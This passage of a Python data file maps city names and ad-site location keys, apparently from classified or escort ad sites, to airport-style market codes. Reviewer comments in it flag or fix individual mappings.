("montreal",): "YUL",
("jackson",): "JAN",
("ottawa",): "YOW",
("charlotte",): "CLT",
("leicester",): "EMA",
# bloomington ambiguous
("southampton",): "SOU",
("milwaukee",): "MKE",
("jacksonville",): "JAX",
("calgary",): "YYC",
("tulsa",): "TUL",
("wichita",): "ICT",
("hamilton",): "YHM",
("eugene",): "EUG",
("albuquerque",): "ABQ",
("greensboro",): "GSO",
("amsterdam",): "AMS",
("memphis",): "MEM",
("leeds",): "LBA",
("albany",): "ALB",
("berlin",): "TXL",
("edmonton",): "YEG",
("bogota",): "BOG",
("raleigh",): "RDU",
("toledo",): "TOL",
("dusseldorf",): "DUS",
("kitchener",): "YKF",
("kiev",): "IEV",
("akron",): "CAK",
("asheville",): "AVL",
("fargo",): "FAR",
("biloxi",): "GPT",
("omaha",): "OMA",
("buffalo",): "BUF",
("brussels",): "BRU",
("medford",): "MFR",
("vienna",): "VIE",
("madison",): "MSN",
("milan",): "MXP",
("minot",): "MOT",
("dublin",): "DUB",
("greenville",): "GSP",
("lexington",): "LEX",
("sarasota",): "SRQ",
("madrid",): "MAD",
("bend",): "RDM",
("tokyo",): "NRT",
("hartford",): "HFD",
("reno",): "RNO",
("tallahassee",): "TLH",
("dayton",): "DAY",
("fredericksburg",): "EZF",
("caracas",): "CCS",
("knoxville",): "TYS",
("munich",): "MUC",
("bucharest",): "OTP",
("lisbon",): "LIS",
("warsaw",): "WAW",
("providence",): "PVD",
("brighton",): "ESH",
("lyon",): "LYS",
("savannah",): "SAV",
("chattanooga",): "CHA",
("tucson",): "TUS",
("barrie",): "QEB",
("halifax",): "YHZ",
("delhi",): "DEL",
("prague",): "PRG",
("shreveport",): "SHV",
("sydney",): "SYD",
("macon",): "MCN",
("brisbane",): "BNE",
("perth",): "PER",
("helsinki",): "HEL",
("zurich",): "ZRH",
("melbourne",): "MEL",
("amarillo",): "AMA",
("florence",): "FLO",
("pensacola",): "PNS",
("palmdale",): "PMD",
("missoula",): "MSO",
("sofia",): "SOF",
("stockholm",): "ARN",
("hampton",): "ORF",
("barcelona",): "BCN",
("moscow",): "SVO",
("naples",): "NAP",
("belfast",): "BFS",
("porto",): "OPO",
("richmond",): "RIC",
("dubai",): "DXB",
("newark",): "EWR",
("rome",): "FCO",
("worcester",): "ORH",
("frederick",): "FDK",
("newcastle",): "NCL",
("edinburgh",): "EDI",
("kolkata",): "CCU",
("bahia",): "SSA",
("hamburg",): "HAM",
("harrisburg",): "MDT",
("huntsville",): "HSV",
("burlington",): "BTV",
("istanbul",): "IST",
("nice",): "NCE",
("martinsburg",): "MRB",
("marseille",): "MRS",
("kelowna",): "YLW",
("gainesville",): "GNV",
("budapest",): "BUD",
("johannesburg",): "JNB",
("bristol",): "BRS",
("yuma",): "YUM",
("copenhagen",): "CPH",
("bangkok",): "BKK",
("quito",): "UIO",
("bellingham",): "BLI",
("shanghai",): "SHA",
("glasgow",): "GLA",
("lincoln",): "LNK",
("auckland",): "AKL",
("tijuana",): "TIJ",
("victoria",): "YYJ",
("arlington",): "IAD",
("oslo",): "OSL",
("youngstown",): "YNG",
("manila",): "MNL",
("windsor",): "YQG",
("roanoke",): "ROA",
("lima",): "LIM",
("flagstaff",): "FLG",
("santiago",): "SCL",
("chelmsford",): "STN",
("medellin",): "MDE",
("coventry",): "CVT",
("norfolk",): "ORF",
("rotterdam",): "RTM",
("chico",): "CIC",
("annapolis",): "ANP",
("honolulu",): "HNL",
("allentown",): "ABE",
("evansville",): "EVV",
("clarksville",): "CKV",
("morgantown",): "MGW",
("montgomery",): "MGM",
("winnipeg",): "YWG",
("frankfurt",): "FRA",
("joplin",): "JLN",
("bangalore",): "BLR",
("duluth",): "DLH",
("maracaibo",): "MAR",
("poughkeepsie",): "SWF",
("syracuse",): "SYR",
("beijing",): "PEK",
("modesto",): "MOD",
("cali",): "CLO",
("cancun",): "CUN",
("christchurch",): "CHC",
("sheffield",): "DSA",
("kingston",): "YGK",
("boise",): "BOI",
("mumbai",): "BOM",
("trenton",): "47N",
("kalamazoo",): "AZO",
("wellington",): "WLG",
("bismarck",): "BIS",
("concord",): "MHT",
("norwich",): "NWI",
("brazilia",): "BSB",
("liverpool",): "LPL",
("osaka",): "KIX",
("scranton",): "AVP",
("anchorage",): "ANC",
("singapore",): "SIN",
("hagerstown",): "HGR",
("topeka",): "FOE",
("oakland",): "OAK",
("strasbourg",): "SXB",
("davenport",): "MLI",
("cordoba",): "COR",
("saginaw",): "MBS",
("richland",): "PSC",
("bangor",): "PWM",
("guangzhou",): "CAN",
("mendoza",): "MDZ",
("bakersfield",): "BFL",
("waco",): "ACT",
("hyderabad",): "HYD",
("jakarta",): "CGK",
("moncton",): "YQM",
("asuncion",): "ASU",
("erie",): "ERI",
("fresno",): "FAT",
("augusta",): "AGS",
("spokane",): "GEG",
("lubbock",): "LBB",
("lansing",): "LAN",
("racine",): "RAC",
("bridgeport",): "BDR",
("seoul",): "ICN",
("butte",): "BTM",
# fayetteville ambiguous
("tacoma",): "TCM",
("mobile",): "MOB",
("odessa",): "MAF",
("hattiesburg",): "HBG",
("casper",): "CPR",
("binghamton",): "BGM",
("champaign",): "CMI",
("billings",): "BIL",
("maui",): "OGG",
("boulder",): "WBU",
("flint",): "FNT",
("peoria",): "PIA",
("spartanburg",): "GSP",
("rockford",): "RFD",
("tuscaloosa",): "TCL",
("helena",): "HLN",
("stockton",): "SCK",
("kamloops",): "YKA",
("reading",): "RDG",
("monterey",): "MRY",
("stamford",): "HPN",
("regina",): "YQR",
("saskatoon",): "YXE",
("hammond",): "ORD",
("kokomo",): "OKK",
("bismark",): "BIS",
("frankurt",): "FRA",
("washington",): "IAD",
("charlottetown",): "YYG",
("hagatna",): "GUM",
("barre",): "BTV",
("roma",): "RMG",
# NOTE(review): capitalized duplicate of ("leicester",) above — presumably
# guards a non-normalized input key; confirm before removing.
("Leicester",): "EMA",
("nottingham",): "NQT",
("pittsburg",): "PIT",
("hollywood",): "BUR",
("santafe",): "SAF",
# 2-WORD city names
("las", "vegas",): "LAS",
("los", "angeles",): "LAX",
("new", "york",): "JFK",
("san", "diego",): "SAN",
("palm", "beach",): "PBI",
("new", "orleans",): "MSY",
("st", "louis",): "STL",
("kansas", "city",): "MCI",
# Fixed: was "MWH" (Moses Lake, WA — see "moseslake" elsewhere in this file);
# every other Washington, DC entry here maps to "IAD".
("washington", "dc",): "IAD",
("san", "jose",): "SJC",
("san", "francisco",): "SFO",
("panama", "city",): "PFN",
("orange", "county",): "SNA",
("san", "antonio",): "SAT",
("fort", "lauderdale",): "FLL",
("oklahoma", "city",): "OKC",
("central", "jersey",): "47N",
("grand", "rapids",): "GRR",
("myrtle", "beach",): "MYR",
("lake", "city",): "LCQ",
("des", "moines",): "DSM",
("daytona", "beach",): "DAB",
("baton", "rouge",): "BTR",
("south", "bend",): "SBN",
("green", "bay",): "GRB",
("kuala", "lumpur",): "KUL",
("fort", "myers",): "RSW",
("colorado", "springs",): "COS",
("long", "island",): "ISP",
("san", "juan",): "SJU",
("niagara", "falls",): "YCM",
("virginia", "beach",): "ORF",
("sioux", "falls",): "FSD",
("saint", "petersburg",): "LED",
("red", "deer",): "YQF",
("st", "cloud",): "STC",
("sao", "paulo",): "GRU",
("charlotte", "amalie",): "STT",
("little", "rock",): "LIT",
("ft", "mcmurray",): "YMM",
("new", "haven",): "HVN",
("buenos", "aires",): "EZE",
("mexico", "city",): "MEX",
("atlantic", "city",): "ACY",
("cape", "town",): "CPT",
("fort", "wayne",): "FWA",
("el", "paso",): "ELP",
("hilton", "head",): "HHH",
("inland", "empire",): "ONT",
("key", "west",): "EYW",
("lake", "charles",): "LCH",
("jersey", "city",): "EWR",
("hong", "kong",): "HKG",
("fort", "collins",): "FNL",
("santa", "barbara",): "SBA",
("corpus", "christi",): "CRP",
("la", "crosse",): "LSE",
("boca", "raton",): "FLL",
("northern", "virginia",): "IAD",
("rapid", "city",): "RAP",
("ann", "arbor",): "ARB",
("palm", "springs",): "PSP",
("taipei", "city",): "TPE",
("cedar", "rapids",): "CID",
("tel", "aviv",): "TLV",
("sioux", "city",): "SUX",
("great", "falls",): "GTF",
("long", "beach",): "LGB",
("terre", "haute",): "HUF",
("ventura", "county",): "OXR",
("fort", "smith",): "FSM",
("traverse", "city",): "TVC",
("st", "john",): "YQM",
("bowling", "green",): "BWG",
("santa", "fe",): "SAF",
("junction", "city",): "MHK",
# 3-WORD city names
("san", "fernando", "valley",): "BUR",
("salt", "lake", "city",): "SLC",
("salvador", "de", "bahia",): "SSA",
("rio", "de", "janeiro",): "GIG",
("west", "palm", "beach",): "PBI",
("st", "john", "s",): "YYT",
("ho", "chi", "minh",): "SGN",
("san", "gabriel", "valley",): "EMT",
("rio", "grande", "valley",): "BRO"
}
# cityvibe_sitekey_to_marketid
# Maps cityvibe site keys — concatenated lower-case city slugs, frequently
# carrying a state/country suffix to disambiguate (e.g. "jacksonms",
# "londonca", "birminghamgb") — to IATA-style market identifiers.
cityvibe_sitekey_to_marketid = {
"auburn": "AUO",
"birmingham": "BHM",
"gadsden": "GAD",
"huntsville": "HSV",
"montgomery": "MGM",
"mobile": "MOB",
"anchorage": "ANC",
"phoenix": "PHX",
"flagstaff": "FLG",
"mohavecounty": "IFP",
"scottsdale": "PHX",
"tucson": "TUS",
"yuma": "YUM",
"fayettevillear": "XNA",
"fortsmith": "FSM",
"littlerock": "LIT",
"losangeles": "LAX",
"sangabrielvalley": "EMT",
"orangecounty": "SNA",
"sanfrancisco": "SFO",
"inlandempire": "ONT",
"bakersfield": "BFL",
"sanmateo": "SQL",
"santacruz": "WVI",
"sandiego": "SAN",
"santabarbara": "SBA",
"sanfernandovalley": "BUR",
"ventura": "OXR",
"santaclara": "SJC",
"sacramento": "SMF",
"chico": "CIC",
"fresno": "FAT",
"northbayca": "STS",
"mendocinocounty": "UKI",
"humboldtcounty": "ACV",
"imperialcounty": "IPL",
"palmdale": "PMD",
"longbeach": "LGB",
"lasvegas": "LAS",
"modesto": "MOD",
"monterey": "MRY",
"sanjose": "SJC",
"santamaria": "SMX",
"napa": "STS",
"oakland": "OAK",
"palmsprings": "PSP",
"sanluisobispo": "SBP",
"santarosa": "STS",
"southlaketahoe": "RNO",
"tahoe": "RNO",
"visalia": "VIS",
"denver": "DEN",
"boulder": "WBU",
"rockies": "EGE",
"coloradosprings": "COS",
"fortcollins": "FNL",
"westernslope": "GJT",
"pueblo": "PUB",
"hartford": "HFD",
"newhaven": "HVN",
"easternconnecticut": "GON",
"northwestconnecticut": "DXR",
"washington": "IAD",
"dover": "ILG",
"newarkde": "ILG",
"wilmingtonde": "ILG",
"orlando": "MCO",
"fortlauderdale": "FLL",
"tampa": "TPA",
"spacecoast": "TIX",
"miami": "MIA",
"ocala": "OCF",
"daytonabeach": "DAB",
"pensacola": "PNS",
"fortmyers": "RSW",
"gainesville": "GNV",
"jacksonville": "JAX",
"westpalmbeach": "PBI",
"lakeland": "LAL",
"panamacity": "PFN",
"sarasota": "SRQ",
"staugustine": "UST",
"stpetersburg": "TPA",
"tallahassee": "TLH",
"albanyga": "ABY",
"treasurecoast": "VRB",
"atlanta": "ATL",
# NOTE(review): "ATH" is Athens, Greece, yet this key sits among the Georgia
# markets (Athens, GA is AHN) — confirm which city is intended.
"athens": "ATH",
"augusta": "AGS",
"savannah": "SAV",
"columbusga": "CSG",
"northwestgeorgia": "RMG",
"statesboro": "TBR",
"hawaii": "KOA",
"honolulu": "HNL",
"maui": "OGG",
"boise": "BOI",
"chicago": "ORD",
"rockford": "RFD",
"bloomington": "BMI",
"chambana": "CMI",
"mattoon": "MTO",
"decaturil": "DEC",
"dixonil": "RFD",
"lasallecounty": "VYS",
"peoria": "PIA",
"naperville": "ORD",
"springfieldil": "SPI",
"eastchicago": "ORD",
"fortwayne": "FWA",
"indianapolis": "IND",
"lafayette": "LAF",
"merrillville": "ORD",
"newalbany": "SDF",
"southbend": "SBN",
"terrehaute": "HUF",
"desmoines": "DSM",
"cedarrapids": "CID",
"councilbluffs": "OMA",
"davenport": "MLI",
"iowacity": "IOW",
"dubuqueia": "DBQ",
"siouxcity": "SUX",
"waterloo": "ALO",
"lawrence": "LWC",
"manhattanks": "MHK",
"shawnee": "MCI",
"topeka": "FOE",
"wichita": "ICT",
"lexington": "LEX",
"louisville": "SDF",
"owensboro": "OWB",
"shepherdsville": "SDF",
"alexandriala": "ESF",
"batonrouge": "BTR",
"lafayettela": "LFT",
"lakecharles": "LCH",
"neworleans": "MSY",
"shreveport": "SHV",
"maine": "PWM",
# Fixed: was "PDX" (Portland, OR — already mapped by "portland" below); the
# "me" suffix means Portland, ME, consistent with "maine": "PWM" above.
"portlandme": "PWM",
"baltimore": "BWI",
"southernmaryland": "2W6",
"collegepark": "IAD",
"cumberlandvalley": "CBE",
"frederick": "FDK",
"westernmaryland": "CBE",
"silverspring": "IAD",
"springfield": "CEF",
"boston": "BOS",
"capecod": "PVC",
"southcoast": "EWB",
"manchesterma": "BOS",
"worcester": "ORH",
"annarbor": "ARB",
"battlecreek": "AZO",
"detroit": "DTW",
"flint": "FNT",
"grandrapids": "GRR",
"jackson": "JXN",
"kalamazoo": "AZO",
"lansing": "LAN",
"monroemi": "TTF",
"northernmichigan": "TVC",
"minneapolis": "MSP",
"duluthmn": "DLH",
"rochestermn": "RST",
"stcloud": "STC",
"biloxi": "GPT",
"northmississippi": "TUP",
"jacksonms": "JAN",
"hattiesburg": "HBG",
"meridian": "MEI",
"saintlouis": "STL",
"columbiamo": "COU",
"joplin": "JLN",
"kansascity": "MCI",
"lakeoftheozarks": "AIZ",
"billings": "BIL",
"grandisland": "GRI",
"greatfalls": "GTF",
"lincoln": "LNK",
"omaha": "OMA",
"elko": "EKO",
"reno": "RNO",
"concordnh": "MHT",
"manchester": "MHT",
"merrimack": "MHT",
"nashua": "MHT",
"newhampshirenh": "MHT",
"southjersey": "MIV",
"northjersey": "EWR",
"centraljersey": "47N",
"jerseyshore": "ACY",
"mountlaurel": "PHL",
"secaucus": "EWR",
"albuquerque": "ABQ",
"farmington": "FMN",
"santafe": "SAF",
"albany": "ALB",
"queens": "JFK",
"brooklyn": "JFK",
"longisland": "ISP",
"bronx": "JFK",
"buffalo": "BUF",
"chautauqua": "JHW",
"westchesterny": "HPN",
"hudsonvalley": "SWF",
"ithaca": "ITH",
"manhattan": "JFK",
"newyork": "JFK",
"rochester": "ROC",
"plattsburgh": "PBG",
"ronkonkoma": "ISP",
"statenisland": "JFK",
"syracuse": "SYR",
"watertown": "ART",
"asheville": "AVL",
"charlotte": "CLT",
"raleigh": "RDU",
"easternnorthcarolina": "PGV",
"fayetteville": "FAY",
"greensboro": "GSO",
"wilmington": "ILM",
"bismarck": "BIS",
"fargo": "FAR",
"grandforks": "GFK",
"minot": "MOT",
"northdakota": "FAR",
"akron": "CAK",
"ashtabula": "HZY",
"cincinnati": "CVG",
"cleveland": "CLE",
"columbus": "CMH",
"dayton": "DAY",
"ohio": "CMH",
"toledo": "TOL",
"youngstown": "YNG",
"oklahomacity": "OKC",
"tulsa": "TUL",
"bend": "RDM",
"eugene": "EUG",
"medford": "MFR",
"portland": "PDX",
"salem": "SLE",
"allentown": "ABE",
"altoona": "AOO",
"philadelphia": "PHL",
"pittsburgh": "PIT",
"harrisburg": "MDT",
"lancaster": "LNS",
"poconos": "MPO",
"scranton": "AVP",
"reading": "RDG",
"williamsport": "IPT",
"york": "THV",
"providence": "PVD",
"pawtucket": "PVD",
"charleston": "CHS",
"columbia": "CAE",
"florencesc": "FLO",
"greenville": "GSP",
"myrtlebeach": "MYR",
"fortpierre": "PIR",
"rapidcity": "RAP",
"chattanooga": "CHA",
"clarksville": "CKV",
"cookeville": "SRB",
"memphis": "MEM",
"tricitiestn": "TRI",
"knoxville": "TYS",
"nashville": "BNA",
"abilene": "ABI",
"amarillo": "AMA",
"dallas": "DFW",
"austin": "AUS",
"beaumont": "BPT",
"fortworth": "DFW",
"collegestation": "CLL",
"corpuschristi": "CRP",
"denton": "DFW",
"elpaso": "ELP",
"galveston": "GLS",
"houston": "IAH",
"huntsvilletx": "UTS",
"killeen": "GRK",
"laredo": "LRD",
"tyler": "TYR",
"lubbock": "LBB",
"mcallen": "MFE",
# Fixed: was "MFA", a transposition — Odessa, TX is "MAF", as this file maps
# "odessa" in the other site-key tables.
"odessa": "MAF",
"sanantonio": "SAT",
"sanmarcos": "HYI",
"texarkana": "TXK",
"waco": "ACT",
"victoria": "VCT",
"wichitafalls": "SPS",
"saltlakecity": "SLC",
"ogden": "OGD",
"provo": "PVU",
"stgeorge": "SGU",
"brattleboro": "BTV",
"burlington": "BTV",
"northernvirginia": "IAD",
"arlington": "IAD",
"fredericksburg": "EZF",
"hamptonva": "ORF",
"newportnews": "ORF",
"norfolk": "ORF",
"richmond": "RIC",
"roanoke": "ROA",
"virginiabeach": "ORF",
"seattle": "SEA",
"bellingham": "BLI",
"everett": "PAE",
"tacoma": "TCM",
"tricities": "PSC",
"moseslake": "MWH",
"mtvernon": "BVS",
"spokane": "GEG",
"yakima": "YKM",
"charlestonwv": "CRW",
"martinsburg": "MRB",
"morgantown": "MGW",
"greenbay": "GRB",
"racine": "RAC",
"madison": "MSN",
"milwaukee": "MKE",
"sheboygan": "SBM",
"wyoming": "CPR",
"calgary": "YYC",
"edmonton": "YEG",
"ftmcmurray": "YMM",
"lethbridge": "YQL",
"reddeer": "YQF",
"abbotsford": "YXX",
"burnaby": "YVR",
"comoxvalley": "YQQ",
"kelowna": "YLW",
"langley": "YXX",
"kamloops": "YKA",
"nanaimo": "YCD",
"princegeorge": "YXS",
"richmondbc": "YVR",
"surrey": "YVR",
"vancouver": "YVR",
"victoriaca": "YYJ",
"whistler": "YWS",
"winnipeg": "YWG",
"fredericton": "YQM",
"moncton": "YQM",
"newbrunswickca": "YQM",
"stjohnscanl": "YYT",
"yellowknife": "YZF",
"halifax": "YHZ",
"barrie": "QEB",
"brampton": "YYZ",
"burlingtonca": "YHM",
"etobicoke": "YYZ",
"guelph": "CNC4",
"hamilton": "YHM",
"kingstonca": "YGK",
"kitchener": "YKF",
"londonca": "YXU",
"markham": "YYZ",
"mississauga": "YYZ",
"newmarket": "YYZ",
"niagarafallsca": "YCM",
"northbay": "YYB",
"northyork": "YYZ",
"oshawa": "YYZ",
"ottawa": "YOW",
"peterbourough": "YPQ",
"pickering": "YYZ",
"richmondhill": "YYZ",
"saultstemarie": "YAM",
"scarborough": "YYZ",
"stcatharines": "YCM",
"toronto": "YYZ",
"sudbury": "YSB",
"thunderbay": "YQT",
"vaughan": "YYZ",
"windsor": "YQG",
"woodbridgeca": "YYZ",
"yorkca": "YYZ",
"dorval": "YUL",
"gatineau": "YUL",
"laval": "YUL",
"longueuil": "YUL",
"montreal": "YUL",
"quebec": "YQB",
"quebeccity": "YQB",
"regina": "YQR",
"saskatoon": "YXE",
"whitehorse": "YXY",
"aberdeen": "ABZ",
"birminghamgb": "BHX",
"brighton": "ESH",
"bristolgb": "BRS",
"cambridgegb": "CBG",
"devon": "EXT",
"eastanglia": "NWI",
"eastmidlands": "EMA",
"edinburgh": "EDI",
"glasgow": "GLA",
"hampshire": "SOU",
"leeds": "LBA",
"liverpool": "LPL",
"london": "LHR",
"manchestergb": "MAN",
"newcastle": "NCL",
"oxford": "OXF",
"sheffield": "DSA",
"wales": "CWL",
"abudhabi": "AUH",
"dubai": "DXB",
"amman": "AMM",
"bahamas": "NAS",
"caribbean": "KIN",
"dominicanrepublic": "SDQ",
"puertorico": "SJU",
"jamaica": "KIN",
"virginislands": "STT",
"bangkok": "BKK",
"duesseldorf": "DUS",
"berlinde": "TXL",
"frankfurt": "FRA",
"hamburg": "HAM",
"muenchen": "MUC",
"koeln": "CGN",
"cabosanlucas": "SJD",
"mexicocity": "MEX",
"cancun": "CUN",
"tijuana": "TIJ",
"bajasur": "SJD",
"pv": "PVR",
"cebu": "CEB",
"doha": "DOH",
"manila": "MNL",
"hongkong": "HKG",
"kuwait": "KWI",
"iceland": "RKV",
"luxembourg": "LUX",
"manama": "BAH",
"moskva": "SVO",
"shanghai": "SHA",
"singapore": "SIN",
"ahmedabad": "AMD",
"bangalore": "BLR",
"chandigarh": "IXC",
"chennai": "MAA",
"delhi": "DEL",
"goa": "GOI",
"hyderabad": "HYD",
"india": "DEL",
"kolkata": "CCU",
"kerala": "TRV",
"indore": "IDR",
"mumbai": "BOM",
"pune": "PNQ",
"surat": "STV",
"amsterdam": "AMS",
"athina": "ATH",
"christchurch": "CHC",
"baleares": "PMI",
"wellington": "WLG",
"auckland": "AKL",
"barcelona": "BCN",
"madrid": "MAD",
"malaga": "AGP",
"brasilia": "BSB",
"balgariya": "SOF",
"portoalegre": "POA",
"riodejaneiro": "GIG",
"recife": "REC",
"salvador": "SSA",
"saopaulo": "GRU",
"canberra": "CBR",
"melbourneau": "MEL",
"perth": "PER",
"sydney": "SYD",
"brussel": "BRU",
"bucuresti": "OTP",
"budapest": "BUD",
"buenosaires": "EZE",
"capetown": "CPT",
"johannesburg": "JNB",
"colombia": "BOG",
"costarica": "SJO",
"genf": "GVA",
"zurich": "ZRH",
"grenoble": "GNB",
"lille": "LIL",
"lyon": "LYS",
"nice": "NCE",
"paris": "CDG",
"helsinki": "HEL",
"guam": "GUM",
"istanbul": "IST",
"telaviv": "TLV",
"kobenhavn": "CPH",
"porto": "OPO",
"lisboa": "LIS",
"milano": "MXP",
"roma": "FCO",
"sardegna": "CAG",
"tokyo": "NRT",
"osaka-kobe-kyoto": "KIX",
"oslo": "OSL",
"praha": "PRG",
"santiago": "SCL",
"seoul": "ICN",
"warszawa": "WAW",
"wien": "VIE",
"coquitlam": "YVR",
"parkersburgoh": "PKB",
"chambersburg": "N68",
"newrivervalley": "BCB",
"medicinehat": "YXH",
"cariboo": "YXS",
"chilliwack": "YXX",
"cranbrook": "YXC",
"peacerivercounty": "YPE",
# NOTE(review): "XCM" also serves as the "chatham" (Ontario) code below, but
# the Skeena region is in British Columbia — confirm this value.
"skeena": "XCM",
"sunshinecoast": "YHS",
"bellevilleca": "YTR",
"brantford": "YFD",
"chatham": "XCM",
"cornwall": "YCC",
"oakville": "YYZ",
"owensound": "YOS",
"sarnia": "YZR",
"saguenay": "YBG",
"sherbrooke": "YSC",
"troisrivieres": "YRQ",
"kaiserslautern": "RMS",
"nuernberg": "NUE",
"veracruz": "VER",
"jaipur": "JAI",
"belfast": "BFS",
"dublinie": "DUB",
"brisbane": "BNE",
"durban": "DUR",
"caracas": "CCS",
"marseille": "MRS",
"guatemala": "GUA",
"jerusalem": "JRS",
"lapaz": "LPB",
"montevideo": "MVD",
"okinawa": "OKA",
"quito": "UIO",
"stockholm": "ARN",
"palmharbor": "TPA",
"clearwater": "TPA",
"saintpetersburg": "TPA",
# NOTE(review): "YXU" is London, Ontario (also "londonca" above); Brandon,
# Manitoba is YBR — confirm which Brandon this key refers to.
"brandon": "YXU",
"redding": "RDD",
"cupertino": "SJC",
"sunnyvale": "SJC",
"paloalto": "SJC",
"alpharetta": "ATL",
"dunwoody": "ATL",
"stonemountain": "ATL",
"duluth": "ATL",
"rosemead": "EMT",
"pasadena": "EMT",
"sangabriel": "EMT",
"baldwinpark": "EMT",
"lapuente": "EMT",
"westcovina": "EMT",
"elmonte": "EMT",
"sandimas": "EMT",
"yuba": "MYV",
"oldtown": "STS",
"roseville": "SMF",
"hollywoodfl": "FLL",
"bocaraton": "FLL",
"pompanobeach": "FLL",
"greatneck": "JFK",
"bohemia": "ISP",
"bellport": "ISP",
"commack": "ISP",
"jacksontn": "MKL",
"ames": "AMW",
"sparks": "RNO",
"anaheim": "SNA",
"costamesa": "SNA",
"fullerton": "SNA",
"yorbalinda": "SNA",
"newportbeach": "SNA",
"irvine": "SNA",
"sanjuancapistrano": "SNA",
"alisoviejo": "SNA",
"hinesville": "SAV",
"vallejo": "OAK",
"vacaville": "SMF",
"rohnertpark": "STS"}
# escortsincollege_sitekey_to_marketid
escortsincollege_sitekey_to_marketid = {
"Abbotsford, British Columbia": "YXX",
"Abilene, Texas": "ABI",
"Akron, Ohio": "CAK",
"Albany, New York": "ALB",
"Albuquerque, New Mexico": "",
"Allentown, Pennsylvania": "ABE",
"Altoona, Pennsylvania": "AOO",
"Amarillo, Texas": "AMA",
"Anchorage, Alaska": "ANC",
"Ann Arbor, Michigan": "",
"Annapolis, Maryland": "ANP",
"Appleton, Wisconsin": "ATW",
"Asheville, North Carolina": "AVL",
"Ashland, Ohio": "HTS",
"Ashtabula, Ohio": "HZY",
"Athens, Ohio": "ATO",
"Atlanta, Georgia": "ATL",
"Auburn, Alabama": "AUO",
"Augusta, Georgia": "AGS",
"Austin, Texas": "AUS",
"Bakersfield, California": "BFL",
"Baltimore, Maryland": "BWI",
"Barrie, Ontario": "QEB",
"Baton Rouge, Louisiana": "",
"Battle Creek, Michigan": "AZO",
"Beaumont, Texas": "BPT",
"Belleville, Ontario": "YTR",
"Bellingham, Washington": "BLI",
"Bend, Oregon": "RDM",
"Bigisland, Hawaii": "KOA",
"Biloxi, Mississippi": "GPT",
"Binghamton, New York": "BGM",
"Birmingham, Alabama": "BHM",
"Blacksburg, Virginia": "BCB",
"Bloomington, Indiana": "BMG",
"Boise, Idaho": "BOI",
"Boone, North Carolina": "NC06",
"Boston, Massachusetts": "BOS",
"Boulder, Colorado": "WBU",
"Bowling Green, Kentucky": "BWG",
"Brantford, Ontario": "YFD",
"Brownsville, Texas": "BRO",
"Brunswick, Georgia": "BQK",
"Buffalo, New York": "BUF",
"Calgary, Alberta": "YYC",
"Cape Cod, Massachusetts": "PVC",
"Carbondale, Illinois": "MDH",
"Cariboo, British Columbia": "YXS",
"Catskills, New York": "20N",
"Cedar Rapids, Iowa": "CID",
"Central Jersey, New Jersey": "47N",
"Central Michigan, Michigan": "LAN",
"Chambana, Illinois": "CMI",
"Chambersburg, Pennsylvania": "N68",
"Charleston, South Carolina": "CHS",
"Charleston, West Virginia": "CRW",
"Charlotte, North Carolina": "CLT",
"Charlottesville, Virginia": "CHO",
"Chatham, Ontario": "XCM",
"Chattanooga, Tennessee": "CHA",
"Chautauqua, New York": "JHW",
"Chesapeake, Virginia": "ORF",
"Chicago, Illinois": "ORD",
"Chico, California": "CIC",
"Chillicothe, Ohio": "RZT",
"Cincinnati, Ohio": "CVG",
"Cleveland, Ohio": "CLE",
"College Station, Texas": "CLL",
"Colorado Springs, Colorado": "COS",
"Columbia, Missouri": "COU",
"Columbia, South Carolina": "CAE",
"Columbus, Ohio": "CMH",
"Comox Valley, British Columbia": "YQQ",
"Cornwall, Ontario": "YCC",
"Corpus Christi, Texas": "CRP",
"Corvallis, Oregon": "CVO",
"Cranbrook, British Columbia": "YXC",
"Cumberland Valley, Maryland": "CBE",
"Dallas, Texas": "DFW",
"Danville, Virginia": "DAN",
"Dayton, Ohio": "DAY",
"Daytona, Florida": "DAB",
"Decatur, Illinois": "DEC",
"Denton, Texas": "DFW",
"Denver, Colorado": "DEN",
"Des Moines, Iowa": "DSM",
"Detroit, Michigan": "DTW",
"Dothan, Alabama": "DHN",
"Dubuque, Iowa": "DBQ",
"Duluth, Minnesota": "DLH",
"East Bay, California": "OAK",
"East Idaho, Idaho": "IDA",
"East Kentucky, Kentucky": "PBX",
"East Oregon, Oregon": "PDT",
"Eastern Connecticut, Connecticut": "GOT",
"Eastern NC, North Carolina": "PGV",
"Eastern Shore, Maryland": "SBY",
"Eauclaire, Wisconsin": "EAU",
"Edmonton, Alberta": "YEG",
"El Paso, Texas": "ELP",
"Elmira, New York": "ELM",
"Erie, Pennsylvania": "ERI",
"Eugene, Oregon": "EUG",
"Evansville, Indiana": "EVV",
"Everett, Washington": "PAE",
"Fargo, North Dakota": "FAR",
"Fayetteville, North Carolina": "FAY",
"Finger Lakes, New York": "D82",
"Flagstaff, Arizona": "FLG",
"Flint, Michigan": "FNT",
"Florence, South Carolina": "FLO",
"Fort Collins, Colorado": "FNL",
"Fort Dodge, Iowa": "FOD",
"Fort Mcmurray, Alberta": "YMM",
"Fort Myers, Florida": "RSW",
"Fort Smith, Arkansas": "FSM",
"Fort Wayne, Indiana": "FWA",
"Frederick, Maryland": "FDK",
"Fredericksburg, Virginia": "EZF",
"Fresno, California": "FAT",
"Ft Lauderdale, Florida": "FLL",
"Gadsden, Alabama": "GAD",
"Gainesville, Florida": "GNV",
"Galveston, Texas": "GLS",
"Glens Falls, New York": "GFL",
"Grand Island, Nebraska": "GRI",
"Grand Rapids, Michigan": "GRR",
"Green Bay, Wisconsin": "GRB",
"Greensboro, North Carolina": "GSO",
"Greenville, South Carolina": "GSP",
"Guelph, Ontario": "CNC4",
"Hamilton, Ontario": "YHM",
"Hampton, Virginia": "ORF",
"Harrisburg, Pennsylvania": "MDT",
"Harrisonburg, Virginia": "SHD",
"Hartford, Connecticut": "HFD",
"Hattiesburg, Mississippi": "HBG",
"Hickory, North Carolina": "HKY",
"Hilton Head, South Carolina": "HHH",
"Honolulu, Hawaii": "HNL",
"Houston, Texas": "IAH",
"Hudson Valley, New York": "SWF",
"Humboldt County, California": "ACV",
"Huntington, West Virginia": "HTS",
"Huntsville, Alabama": "HSV",
"Huntsville, Texas": "UTS",
"Indianapolis, Indiana": "IND",
"Inland Empire, California": "ONT",
"Iowa City, Iowa": "IOW",
"Ithaca, New York": "ITH",
"Jackson, Mississippi": "JAN",
"Jacksonville, Florida": "JAX",
"Janesville, Wisconsin": "JVL",
"Jersey Shore, New Jersey": "ACY",
"Jonesboro, Arkansas": "JBR",
"Joplin, Missouri": "JLN",
"Kalamazoo, Michigan": "AZO",
"Kamloops, British Columbia": "YKA",
"Kansas City, Missouri": "MCI",
"Kauai, Hawaii": "LIH",
"Kelowna, British Columbia": "YLW",
